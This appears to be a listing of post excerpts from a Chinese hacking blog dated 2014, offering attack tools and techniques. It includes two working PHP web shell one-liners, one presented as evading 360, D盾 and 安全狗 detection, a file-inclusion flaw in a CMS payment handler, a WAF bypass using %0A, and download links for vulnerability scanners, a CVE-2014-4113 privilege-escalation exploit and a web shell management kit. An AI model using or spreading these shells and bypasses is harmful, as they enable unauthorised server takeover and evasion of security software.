admin 发布于 2014-11-13 12:17
首先还是老地方:archive_act.php(611行)
function respond_action() {
include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';
$payclassname = front::$g...
admin 发布于 2014-11-09 01:24
WEB漏洞一键提取工具
分享给大家
MScan.rar
解压密码:nmap.cc
admin 发布于 2014-11-09 01:22
轻量级网站漏洞批量扫描器
可以配合手工或者软件批量整理出网站地址
然后导入这软件里面自动识别漏洞
也是整理网盘发现的它
分享给大家
web漏洞扫描器v1.0.rar
解压密码:nmap.cc
admin 发布于 2014-11-08 10:25
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。
<?php @include($_FILES['u']['tmp_name']);
<?php @include($_FILES['u...
admin 发布于 2014-10-23 06:52
[music url=http://bcs.duapp.com/yulong/我们好像在哪见过.mp3 w=300 h=30 auto=1]
admin 发布于 2014-10-22 08:30
安全狗最新版绕过测试 2014-10-22
原文链接:http://phpsec.sinaapp.com/?p=270
测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。
用于绕过的核心字符:%0A,某些特殊场合需要...
admin 发布于 2014-10-20 11:40
windows提权cve2014-4113点击下载
解压码:nmap.cc
亲测xp 32、win2003(32 and 64)、win2008(32 and 64)
admin 发布于 2014-10-19 11:47
D盾,他不认识二维数组,所以就很轻松绕过了。 对了 还有360哦~ 测试了下安全狗,也查不出来,,。
<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['whirlwind']); //密码whirlwi...
admin 发布于 2014-10-13 04:17
WEBSHELL箱子系统.zip 解压密码 lanxiang
admin 发布于 2014-10-04 08:07
最近发现有不少2003登陆进去的时候,显示什么国防部啊,输入的用户名也不叫用户名了,叫国防部用户,密码也不叫密码了,叫国防部秘钥。
本文原创,转载留请带版权,谢谢合作。HTTP://NMAP.CC
如图:
那叫个装逼啊。
下面我把方法告诉大家,首先把system32下的m...
